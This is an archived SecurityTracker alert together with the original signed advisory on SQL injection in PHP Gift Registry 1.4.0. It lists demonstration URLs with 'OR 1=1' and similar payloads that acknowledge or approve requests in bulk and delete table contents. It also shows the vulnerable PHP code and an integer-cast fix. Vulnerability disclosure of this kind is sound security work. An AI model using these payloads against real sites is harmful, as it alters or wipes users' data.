SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   phpGiftReq Vendors:   phpgiftreg.sourceforge.net
PHP Gift Registry Parameter Input Validation Hole Lets Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1012910
SecurityTracker URL:  http://securitytracker.com/id/1012910
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 16 2005
Impact:   Disclosure of system information, Disclosure of user information, Modification of user information
Exploit Included:  Yes  
Version(s): 1.4.0
Description:   Madelman reported an input validation vulnerability in PHP Gift Registry (phpGiftReq). A remote user can inject SQL commands.

The script does not properly validate user-supplied input. A remote user can supply a specially crafted URL to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/phpgiftreg/index.php?action=ack&messageid=2%20OR%201%3d1

http://[target]/phpgiftreg/index.php?action=approve&shopper=1%20OR%201%3d1

http://[target]/phpgiftreg/index.php?action=decline&shopper=1%20OR%201%3d1

http://[target]/phpgiftreg/index.php?action=request&shopfor=3%2c0%29%2c%2899%2c100

http://[target]/phpgiftreg/index.php?action=cancel&shopfor=3%20OR%201%3d1

http://[target]/phpgiftreg/item.php?action=delete&itemid=3%20OR%201%3d1

Other parameters and functions may also be affected.

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  phpgiftreg.sourceforge.net/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  phpGiftReq SQL Injection


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title: phpGiftReq SQL Injection
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 16/01/2005
Severity: Moderately critical

Summary:
- --------

The PHP Gift Registry is a web-enabled gift registry intended for use
among a circle of family members or friends
(from vendor site: http://phpgiftreg.sourceforge.net/)

phpGiftReq doesn't validate the parameters. This allows SQL Injection
and modification of data in the database.

This vulnerability has been tested with phpGiftReq 1.4.0

Details:
- --------

Acknowledge all messages
http://[SERVER]/phpgiftreg/index.php?action=ack&messageid=2%20OR%201%3d1

Approve all pending requests
http://[SERVER]/phpgiftreg/index.php?action=approve&shopper=1%20OR%201%3d1

Decline all pending requests
http://[SERVER]/phpgiftreg/index.php?action=decline&shopper=1%20OR%201%3d1

Inserts current shopper for buying to user 3 without need for approval
http://[SERVER]/phpgiftreg/index.php?action=request&shopfor=3%2c0%29%2c%2899%2c100

Delete all data from table shoppers
http://[SERVER]/phpgiftreg/index.php?action=cancel&shopfor=3%20OR%201%3d1

Delete all data from table items
http://[SERVER]/phpgiftreg/item.php?action=delete&itemid=3%20OR%201%3d1

I'm fairly sure there are a lot more places where SQL can be injected,
but I don't havetime to check them all.


Solution:
- ---------

All parameters should be converted to integers before creating the query.

Example:

Substitute

if ($action == "ack") {
~    $query = "UPDATE messages SET isread = 1 WHERE messageid = " .
$_GET["messageid"];
~    mysql_query($query) or die("Could not query: " . mysql_error());
}

with

if ($action == "ack") {
~    $query = "UPDATE messages SET isread = 1 WHERE messageid = " .
((int) $_GET["messageid"]);
~    mysql_query($query) or die("Could not query: " . mysql_error());
}


Timeline
- --------

31/12/2004 - Vulnerability found
31/12/2004 - Vendor contacted
16/01/2005 - Vendor hasn't replied. Advisory released
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFB6qif3RWooxY20cIRAmSdAKCJEpPvYyfMpLC0YVP0XMz7OK7maQCcDZOC
DI/zEDH+ORCaUt2uvRiL1eo=
=44JS
-----END PGP SIGNATURE-----
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC